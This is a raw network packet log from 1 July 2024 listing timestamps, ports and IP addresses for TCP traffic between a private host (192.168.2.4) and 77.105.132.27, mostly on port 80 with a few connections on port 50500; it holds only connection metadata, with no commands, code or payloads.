Jul 1, 2024 09:16:17.786004066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.786016941 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.786019087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.786032915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.786046982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.786055088 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.786062956 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.786070108 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.786078930 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.786087990 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.786092997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.786112070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.786124945 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.786128044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.786144018 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.786153078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.786174059 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.786201000 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787513971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787528992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787544012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787559986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787564993 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787574053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787589073 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787589073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787605047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787612915 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787621975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787626982 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787661076 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787867069 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787883043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787898064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787908077 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787921906 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787934065 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787938118 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787944078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787952900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787961960 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787967920 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787976980 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787982941 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.787996054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.787997007 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.788012028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.788022041 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.788027048 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.788041115 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.788053989 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.788057089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.788072109 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.788078070 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.788089991 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.788093090 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.788105011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.788120985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.788126945 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.788134098 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.788136005 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.788144112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.788146019 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.788218021 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.790299892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790317059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790329933 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790344954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790359020 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790374041 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790381908 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.790388107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790402889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790406942 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.790416956 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790431976 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790446997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790455103 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.790462971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790468931 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.790477037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790491104 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.790491104 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790504932 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790518999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790525913 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.790534019 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790548086 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.790549994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790564060 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790572882 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.790580988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790599108 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.790623903 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.790975094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.790992975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.791007042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.791028976 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.791043043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.791045904 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.791058064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.791080952 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.791119099 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.878429890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.878479004 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.878494024 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.878573895 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.878602982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.878618002 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.878633022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.878644943 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.878647089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.878662109 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.878671885 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.878705025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.879019022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879034042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879048109 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879064083 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879070997 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.879080057 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879095078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879108906 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879111052 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.879123926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879134893 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.879139900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879154921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879160881 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.879177094 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.879201889 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.879642010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879657030 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879669905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879684925 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879700899 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879702091 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.879714966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879729986 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.879730940 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879744053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.879753113 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.879769087 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.879796028 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.880306959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880321980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880336046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880350113 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880352020 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.880364895 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880372047 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.880379915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880387068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.880394936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880418062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880418062 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.880433083 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880438089 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.880448103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880462885 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880467892 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.880476952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880487919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.880508900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880511045 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.880525112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.880533934 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.880549908 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.880568981 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.881243944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881261110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881273985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881290913 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.881295919 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881299019 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.881310940 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881319046 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.881325960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881336927 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.881340027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881350994 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.881356001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881371021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881376982 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.881386042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881395102 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.881400108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881413937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881428957 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881429911 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.881444931 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881452084 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.881458998 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.881464005 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.881495953 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.883065939 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883080959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883095026 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883109093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883125067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883132935 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.883140087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883153915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883161068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.883168936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883177996 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.883183002 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883186102 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.883198023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883213043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883218050 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.883227110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883239031 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.883243084 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883258104 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.883264065 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.883296967 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.884700060 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884717941 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884731054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884747028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884761095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884774923 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884779930 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.884788990 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884804010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884809017 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.884819031 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884824038 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.884833097 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884839058 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.884849072 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884865999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884880066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884886026 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.884895086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884896040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.884910107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.884922981 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.884953022 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.886567116 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886584997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886600018 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886614084 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886627913 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886645079 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.886652946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886657953 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.886667967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886683941 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886692047 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.886701107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886702061 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.886717081 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886730909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886746883 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886750937 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.886760950 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886770964 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.886775970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886789083 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.886792898 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.886816025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.886840105 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.888015985 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.888031006 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.888045073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.888058901 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.888072968 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.888078928 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.888087988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.888104916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.888112068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.888119936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.888134003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.888144970 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.888149023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.888164043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.888170958 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.888183117 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.888212919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.972930908 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.973920107 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.279464006 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.279786110 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.284820080 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.285842896 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.450154066 CEST	49756	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.462716103 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.462830067 CEST	49756	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.472502947 CEST	49756	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.477333069 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.477411032 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.477888107 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.477901936 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.484776974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.677536011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.677581072 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.677604914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.677623987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.677638054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.677654982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.677658081 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.677678108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.677690029 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.677692890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.677737951 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.677964926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.677983046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678008080 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678024054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678204060 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678220987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678236961 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678251982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678252935 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678267956 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678272009 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678284883 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678302050 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678304911 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678322077 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678359985 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678576946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678592920 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678606033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678628922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678633928 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678643942 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678658009 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678663015 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:19.678673029 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:19.678688049 CEST	80	49752	77.105.132.27	192.168.2.4
